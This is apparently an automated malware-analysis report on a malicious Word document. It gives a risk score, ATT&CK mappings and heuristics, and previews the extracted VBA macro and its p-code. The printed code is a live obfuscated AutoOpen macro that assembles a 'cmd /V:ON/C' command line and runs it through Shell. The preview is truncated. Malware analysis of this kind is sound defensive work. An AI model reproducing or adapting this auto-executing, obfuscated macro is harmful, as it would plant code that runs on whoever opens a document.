Verdict: MALICIOUS
Risk Score: 82

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute an arbitrary command using the Shell function, likely to download and run a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of its exact function.
Heuristics (4)

- VBA macros detected (medium; 1 related finding). OLE_VBA_MACROS: Document contains VBA macro code.
- AutoOpen macro (high). OLE_VBA_AUTOOPEN: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium). OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info). EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42864 bytes | 9a854b7de1e584a15ca15940fe5bc9235d814029df9269225ab87157566b8405 |

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(211519271)
TypeName 95
TypeName dwcBFA
TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
TypeName Oct(7415 + wBbjOc)
TypeName Hex(820)
End Sub
' Processing file: /opt/analyzer/scan_staging/3e682616ca0c47748e5fcceb6a8b4baa.bin
' ===============================================================================
' Module streams:
' Macros/VBA/VXzoOtZVpkqYRd - 1982 bytes
' Line #0:
'     FuncDefn (Sub AutoOpen())
' Line #1:
'     OnError (Resume Next)
' Line #2:
'     LitDI4 0x8727 0x0C9B
'     FnSgn
'     ArgsCall TypeName 0x0001
' Line #3:
'     LitDI2 0x005F
'     ArgsCall TypeName 0x0001
' Line #4:
'     Ld dwcBFA
'     ArgsCall TypeName 0x0001
' Line #5:
'     Ld PRhtji
'     Ld pzwJz
'     LitDI4 0x55A4 0x0001
'     Mul
'     Sub
'     Ld zFlLNk
'     Sub
'     ArgsLd Atn 0x0001
'     ArgsCall TypeName 0x0001
' Line #6:
'     Ld PrhbH
'     ArgsCall TypeName 0x0001
' Line #7:
'     Ld vbKeyC
'     ArgsLd KeyString 0x0001
'     Ld JQjiYpwTYJh
'     Add
'     Ld wADEWZn
'     Add
'     Ld qkocjRXozk
'     Add
'     Ld SrLJcKU
'     Add
'     Ld jqfOKroKkj
'     Add
'     Ld UVMStnSwnuS
'     Add
'     Ld cXoQHhaw
'     Add
'     Ld XfuLUTYcN
'     Add
'     Ld qjOpKzfk
'     Add
'     Ld khOUbITmDB
'     Add
'     Ld SwAEVG
'     Add
'     Ld hNfIrziVNvNEYQ
'     Add
'     Ld SRmwQuwFmolR
'     Add
'     LitDI4 0x16D9 0x2C98
'     LitDI4 0x16D9 0x2C98
'     Sub
'     ArgsCall Shell@ 0x0002
' Line #8:
'     LitDI2 0x1CF7
'     Ld wBbjOc
'     Add
'     ArgsLd Oct 0x0001
'     ArgsCall TypeName 0x0001
' Line #9:
'     LitDI2 0x0334
'     ArgsLd Hex 0x0001
'     ArgsCall TypeName 0x0001
' Line #10:
'     EndSub
' Line #11:
' Macros/VBA/HqzoUYE - 22104 bytes
' Line #0:
'     FuncDefn (Function qkocjRXozk())
' Line #1:
'     OnError (Resume Next)
' Line #2:
'     LitDI2 0x0008
'     ArgsCall TypeName 0x0001
' Line #3:
'     LitDI2 0x0005
'     ArgsCall TypeName 0x0001
' Line #4:
'     Ld uUwTP
'     Ld BCNfj
'     Div
'     Ld IjllC
'     Ld Jtdss
'     Mul
'     Add
'     Coerce (Bool)
'     ArgsCall TypeName 0x0001
' Line #5:
'     LitStr 0x0002 "md"
'     LitStr 0x0002 " /"
'     Add
'     LitStr 0x0001 "V"
'     Add
'     LitStr 0x0001 ":"
'     Add
'     LitStr 0x0002 "ON"
'     Add
'     LitStr 0x0001 "/"
'     Add
'     LitStr 0x0001 "C"
'     Add
'     Ld HkvQaIqZq
'     Ld jJuaHnM
'     Add
'     LitDI2 0x0022
'     Add
'     Ld OkbwZzio
'     Add
'     Ld optdlER
'     Add
'     ArgsLd Chr 0x0001
'     Coerce (Str)
'     Add
'     LitStr 0x0001 "s"
'     Add
'     St pMjuPE
' Line #6:
'     LitDI2 0x03B8
'     ArgsCall TypeName 0x0001
' Line #7:
'     LitDI4 0xD4E5 0x0A95
'     ArgsCall TypeName 0x0001
' Line #8:
'     LitStr 0x0001 "e"
'     LitStr 0x0003 "t #"
'     Add
'     LitStr 0x0001 " "
'     Add
'     LitStr 0x0003 " ="
'     Add
'     LitStr 0x0003 "wjt"
'     Add
'     LitStr 0x0001 "h"
'     Add
'     LitStr 0x0003 "MMi"
'     Add
'     LitStr 0x0001 "M"
'     Add
'     St iDYaVqOhNV
' Line #9:
'     LitDI4 0x8E5E 0x06DF
'     ArgsLd Sqr 0x0001
'     ArgsCall TypeName 0x0001
' Line #10:
'     Ld ciqCu
'     ArgsLd Sqr 0x0001
'     ArgsCall TypeName 0x0001
' Line #11:
'     LitStr 0x0002 "Ur"
'     LitStr 0x0001 "v"
'     Add
'     LitStr 0x0003 "GUs"
'     Add
'     LitStr 0x0003 "Cvw"
'     Add
'     LitStr 0x0002 "HW"
'     Add
'     LitStr 0x0003 "NTV"
'     Add
'     LitStr 0x0001 "r"
'     Add
'     LitStr 0x0002 "p="
'     Add
'     LitStr 0x0001 "/"
'     Add
'     LitStr 0x0002 "xo"
'     Add
'     LitStr 0x0003 "au-"
'     Add
'     LitStr 0x0001 "b"
'     Add
'     St jtChbj
' Line #12:
'     Ld TFrDZY
'     ArgsCall TypeName 0x0001
' Line #13:
'     LitDI2 0x086D
'     ArgsLd Log 0x0001
'     ArgsCall TypeName 0x0001
' Line #14:
'     LitDI2 0x0048
'     ArgsCall TypeName 0x0001
' Line #15:
'     LitStr 0x0003 "lS9"
'     LitStr 0x0003 "P:)"
'     Add
'     LitStr 0x000 ... (truncated)
```